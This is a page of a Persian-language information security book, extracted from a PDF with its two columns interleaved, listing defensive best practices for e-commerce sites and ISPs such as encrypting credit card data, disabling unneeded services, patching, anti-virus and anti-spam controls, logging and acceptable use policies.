ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺗﺠﻬﻴـﺰﺍﺕ • ﻛﺎﺭﺑﺮﺍﻥ ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﭼﻪ ﺩﺍﺩﻩ ﻫﺎﻳﻲ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺯ
ﺷﺒﻜﻪ )ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ ،ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ،ﺳـﻮﺋﻴﭽﻬﺎ ،ﻭ (... ﺁﻥ ﺑﺮﺍﻱ ﭼـﻪ ﻣﻨﻈـﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ،ﻭ
ﻧﺼﺐ ﻛﻨﻴﺪ. ﭼﮕﻮﻧﻪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ )ﻣﻲﺗﻮﺍﻧﻴﺪ
ﭼﮕﻮﻧﮕﻲ ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﻭ ﻣـﺒﻬﻢ ﺗﻮﺿـﻴﺢ
ﺑﺮﺍﻱ ﻛﻠﻴﺔ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻛـﻪ •
ﺩﻫﻴﺪ(.
ﺭﻭﻱ ﺧﻂ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ. ﺍﮔﺮ ﺑﺮﺍﻱ ﺑﺮﺩﺍﺷﺖ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ ،ﺍﻋﺘﺒـﺎﺭ •
ﺁﻧﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴـﺪ ﺍﻃﻤﻴﻨـﺎﻥ
ﻫﻤــﺔ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ ﻏﻴﺮﺿــﺮﻭﺭﻱ )ﻣﺜــﻞ •
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ،Webﻓﺮﺍﺧــﻮﺍﻧﻲ ﺗــﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،٢٠٤ﻭ ﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺧﻂ ﺍﺭﺗﺒـﺎﻃ ﹺ
ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ (٢٠٥ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ. ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ .ﺍﮔـﺮ ﺍﺯ ﻳـﻚ ﻣـﻮﺩﻡ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴـﺪ ،ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﻦ ﻛـﻪ ﺍﻣﻜـﺎﻥ
ﺝ( ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺍﺯ ﺑﻴﺮﻭﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﺟﻬﺎﻧﻲ ﻭﺏ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ: ﺍﮔﺮ ﺳﻮﺍﺑﻘﻲ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺑـﻪ •
ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ ،ﺑﻌـﻼﻭﺓ • ﭼﺎﭖ ﻣﻲﺭﺳﺎﻧﻴﺪ ،ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻨﻴﺖ
ﻧﻜﺎﺕ ﺯﻳﺮ: ﺁﻧﻬﺎ ﺭﺍ ﺗﺄﻣﻴﻦ ﻛﻨﻴﺪ ﻭ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﻳﮕﺮ
ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻧﺒﻮﺩﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﺩﺳﺘﮕﺎﻩ ﻛﺎﻏﺬﺧﺮﺩﻛﻦ ﺍﺯ
ﺍﻃﻼﻋــﺎﺕ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺭﺍ ﺩﺭ •
ﺑﻴﻦ ﺑﺒﺮﻳﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ
ﻫﺴﺘﻨﺪ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ .ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻲ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻌﺘﺒﺮ ،ﭼﻨﺪ ﻛﺘﺎﺏ ﺑﻪﺭﻭﺯ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ •
ﺩﻳﮕﺮ ﻭ ﭘﺸﺖ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ ﻭ ﺑـﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺨﺮﻳﺪ ،ﺁﻧﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ
ﻗــﺮﺍﺭ ﺩﻫﻴــﺪ ،ﻭ ﺗﻮﺻــﻴﻪﻫﺎﻳــﺸﺎﻥ ﺭﺍ ﺩﻧﺒــﺎﻝ ﻛﻨﻴــﺪ.
202 John Wiley and Sons ﺍﻧﺘــﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠــﻲ ﻭ ﺷــﺮﻛﺎ ،٢٠١ﺟــﺎﻥ ﻭﺍﻳﻠــﻲ ﻭ
203 Osborne / McGraw-Hill
204 )Remote Procedure Call (RPC
205 )File Transfer Protocol (FTP 201 O'Reilly & Associates
٢٠٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻛـﺎﺭﺑﺮ ،ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ • ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺍﺯ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺗـﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻳـﺎ
ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺳﺎﻳﺮ ﺭﻭﺷﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻪ ﻫﻤـﺮﺍﻩ ﻳـﻚ ﺳﻴـﺴﺘﻢ
ﺩﻳﮕﺮ ﻧﮕﺬﺍﺭﻳﺪ. ﻏﺮﺑﺎﻝﺳﺎﺯ ﺧﻮﺏ ﺩﺭ ﺳﻄﺢ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ.
ﻫﺮﮔﺎﻩ ﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺭﺳـﺎﻝ ﻣـﻲﻛﻨﻴـﺪ ،ﺑـﻪ ﺁﻧﻬـﺎ •
ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺁﻧﻬـﺎ ﺭﺍ ﭼﮕﻮﻧـﻪ ﺑﺪﺳـﺖ ﺗﻤﺎﻡ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ •
ﺁﻭﺭﺩﻩﺍﻳــﺪ ﻭ ﺁﻧﻬــﺎ ﭼﮕﻮﻧــﻪ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺁﺩﺭﺱ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﻗﻮﻳﺘﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻣﻮﺟﻮﺩ )ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ ﺑـﺎ
ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻧﺎﻣﻪﻫﺎﻱ ﺷﻤﺎ ﺣﺬﻑ ﻛﻨﻨﺪ. ﻛﻠﻴﺪ ۱۲۸ﺑﻴﺘﻲ( ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ.
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ ﻭ • ﺍﻃﻤﻴﻨــﺎﻥ ﺣﺎﺻــﻞ ﻛﻨﻴــﺪ ﻛــﻪ ﺍﻃﻼﻋــﺎﺕ ﻛــﺎﺭﺕ •
ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ. ﺍﻋﺘﺒﺎﺭﻱ ﻛﻪ ﻣﻮﻗﺘﹰﺎ ﺩﺭ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﻭﺏ ﺫﺧﻴـﺮﻩ
ﺷﺪﻩ ﺍﺳﺖ ،ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﺗﺮﺍﻛﻨﺶ ﭘـﺎﻙ
ﺯﻣﺎﻧﻴﻜﻪ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻱ ﺑﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻧﺪﺍﺭﻳـﺪ ،ﺁﻧﻬـﺎ ﺭﺍ •
ﻣﻲﺷﻮﺩ.
ﭘﺎﻙ ﻛﻨﻴﺪ.
ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﺑـﺮﺍﻱ ﻣـﺪﺕ ﺯﻳـﺎﺩﻱ ﺍﺯ • ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺣﺘﻤـ ﹰﺎ ﺑﺎﻳـﺪ ﺭﻭﻱ ﺩ(
ﺑﺨﺶ ﺳﻮﻡ
ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ ،ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ:
ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺷﺨﺎﺹ ﻣﻲﺷـﻮﺩ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺣـﺬﻑ
ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺑﺎﻻ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ ،ﺍﻣﺎ ﺑﺎ ﻫﻮﺷـﻴﺎﺭﻱ •
ﻛﻨﻴﺪ.
ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ .ﺁﻥ ﺭﺍﻳﺎﻧـﻪ،
ﻧﺎﻗﻀﺎﻥ ﺳﻴﺎﺳﺖ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﺭﺍ ﺗﺄﺩﻳـﺐ ﻳـﺎ ﺍﺧـﺮﺍﺝ • ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺁﻥ ،ﻭ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ
ﻧﻤﺎﻳﻴﺪ. ﺩﻗﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﺍﺋﻤﻲ ﺑﺎﺷﻨﺪ.
ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴـﺪ ﻛـﻪ ﻫﻤـﺔ ﺧـﺪﻣﺎﺕ ﻏﻴﺮﺿـﺮﻭﺭﻱ )ﻣﺜـﻞ • ﺍﻣﻨﻴﺘﻲ )ﮔﺰﺍﺭﺵ ﺑﻪ ﻋﻮﺍﻣﻞ ﺩﺍﺧﻠـﻲ ﺳـﺎﺯﻣﺎﻥ ،ﺑـﻪ ISPﻫـﺎ ،ﻭ ﻧﻴـﺰ
،ftp ،icq ،fingerﻛﺎﻣﭙﺎﻳﻠﺮﻫـﺎ ﻭ (...ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻗﺎﺑـﻞ ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ(
ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ،ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ. ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨﻴـﺪ )ﺁﻳـﺎ ﺗﻨﻬـﺎ •
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻤﺔ ﺩﺳـﺘﮕﺎﻫﻬﺎ -ﺧـﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ • ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﻆ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﻤﺎﺳﺖ ،ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺗﺎ ﭼﻪ ﻣﺪﺕ
ﻛــﻪ ﻗﺎﺑــﻞ ﺍﺗــﺼﺎﻝ ﺑــﻪ ﺍﻳﻨﺘﺮﻧــﺖ ﻫــﺴﺘﻨﺪ -ﺑــﺎ ﺍﻋﻤــﺎﻝ ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ،ﻭ .(...
ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ. ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺩﺭ ﺧﺼﻮﺹ ﭼﮕﻮﻧﮕﻲ ﻭﺍﻛـﻨﺶ •
ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻣﺪﺍﻭﻡ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺘﻮﺍﻧﻴـﺪ • ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥISP ،ﻫـﺎﻱ
ﻣــﺸﻜﻼﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﺣﻤــﻼﺕ ﺗﺨﺮﻳــﺐ ﺳــﺮﻭﻳﺲ ﻭ ﻫﻤﺘﺎ ،ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪﮔﺎﻥ ﻋﻤﺪﺓ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ،ﻭ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻋﻤﺪﺓ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺭﺍ ﺗـﺸﺨﻴﺺ ﺍﻳﻨﺘﺮﻧﺖ.
ﺩﻫﻴﺪ .ﺍﻳﻦ ﻧﻴﺎﺯﻣﻨﺪ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﻗـﺎﺩﺭ ﺑﺎﺷـﻴﺪ ﺍﻟﮕﻮﻫـﺎﻱ ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﺪﻣﺎﺕ ﺷـﻤﺎ ﺑـﻪ •
ﻃﺒﻴﻌﻲ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ. ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﻴﺮﻭﻧــﻲ ﺣﻤﻠــﻪ ﻛﻨﻨــﺪ .ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺑــﺮﺍﻱ
ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻗﺎﺑﻠﻴﺖ ﻛﻨﺘﺮﻝ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗﺎ ﺑﻬﺘﺮ ﺑﺘﻮﺍﻧﻴـﺪ • ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺳﺎﻳﺮ ISPﻫﺎ ﻣﺒﻨﻲ ﺑـﺮ ﺩﺳـﺖ
ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ )ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺩﺍﺷﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺷﻤﺎ ﺩﺭ ﺣﻤﻼﺕ ،ﻳﻚ ﺳﻴﺎﺳﺖ ﺗـﺪﻭﻳﻦ
ﻭ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ(. ﻧﻤﺎﻳﻴﺪ.
ﻭﻳﺮﻭﺱﻳﺎﺏﻫﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﺟﺎﻳﻲ ﻛﻪ ﻭﺭﻭﺩ ﻳﺎ ﺧﺮﻭﺝ ﭘـﺴﺖ • ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﺳﻄﺢ ISPﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻭﻳﺮﻭﺱﻳﺎﺏ •
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ. ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ،ﻣﻤﻜﻦ ﺍﺳـﺖ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﺑـﺮﺍﻱ
ﻓﺮﺳﺘﻨﺪﺓ ﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﻫـﺸﺪﺍﺭﻫﺎﻳﻲ ﻣﺒﻨـﻲ ﺑـﺮ "ﻋـﺪﻡ
ﺑﺎ ﺗﻬﻴﻪ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻳﺎ ﺍﺭﺯﺍﻥﻗﻴﻤﺖ ،ﻣـﺸﺘﺮﻳﺎﻥ •
ﺍﻧﺘﻘﺎﻝ ﻧﺎﻣﻪ ﺑﺪﻟﻴﻞ ﺁﻟﻮﺩﮔﻲ ﺑﻪ ﻭﻳﺮﻭﺱ" ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ.
ﺧﻮﺩ ﺭﺍ ﺗﺮﻏﻴﺐ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ.
ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﻣﺠﺎﺯ ) ٢٠٦(AUPﺗﺪﻭﻳﻦ ﻛﻨﻴـﺪ ﻛـﻪ •
ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ •
ﺷﺎﻣﻞ ﻭﻇـﺎﻳﻒ ﻣﺘﻘﺎﺑـﻞ ISPﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺎﺷـﺪ .ﺍﻳـﻦ
ﻳﻚ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﺓ ﻫﺮﺯﻧﺎﻣﻪ ﺗﺒﺪﻳﻞ ﻧﺸﻮﺩ.
ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ. • ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﺑﺮﻗﺮﺍﺭﻱ ﻭ ﻗﻄـﻊ • ﺷﺒﻜﻪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﺎ ﺣـﺪ ﺍﻣﻜـﺎﻥ •
ﺍﺗﺼﺎﻝ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴـﺪ ﺗـﺎ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺑـﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻋﻤﻠﻲ ﺑﺎﺷﺪ .ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺭﺍ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴـﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﻛﻨﺘﺮﻝ ﻭ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻨﺪ )ﺍﺯ ﺟﻤﻠﻪ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ
ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ. ﻛـﺎﺭﺑﺮﻱ( ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺠﺰﺍ ﺷـﺪﻩ
ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺧـﻮﺩ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ • ﺑﺎﺷﻨﺪ.
ﻣﺠﻤﻮﻋﻪﺍﻱ ﺳﺨﺘﮕﻴﺮﺍﻧﻪ ﻭ ﻫﻤﭙﻮﺷﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ. ﺍﻃﻤﻴﻨﺎﻥ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺑﺨـﺶ •
ﻭﺻـــﻠﻪﻫـــﺎﻱ ﺍﻣﻨﻴﺘـــﻲ ﺭﺍ downloadﻭ ﺍﺯ ﻃﺮﻳـــﻖ • ﻣﺪﻳﺮﻳﺖ ،ﺑﺨﺶ ﺧﺪﻣﺎﺕ )ﻣﺜـﻞ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﭘـﺴﺖ
ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻭ ﻳﺎ ﺷﺒﻜﺔ ﺗﻮﺯﻳﻊ ﻣﺤﻠﻲ ،ﺗﻮﺯﻳﻊ ﻛﻨﻴﺪ. ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻭﺏ ،ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ Proxy ،ﻭ (DNSﻭ ﺗﻤــﺎﻡ
ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ ﻭ ﻛﻨﺘﺮﻟﻲ ﺷﺒﻜﻪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ
ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺗﺴﻬﻴﻞ ﻛﺮﺩﻩﺍﻳﺪ ،ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﻣـﺼﺮﻓﻲ ﻣــﺴﺘﺤﻜﻢ ﻭ ﻗــﻮﺍﻧﻴﻦ ﺩﺳﺘﺮﺳــﻲ ﻣﺤﺪﻭﺩﺷــﺪﻩ ﺍﺳــﺘﻔﺎﺩﻩ
ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﺍﺩﻩﺍﻳﺪ. ﻣﻲﻛﻨﻴﺪ.
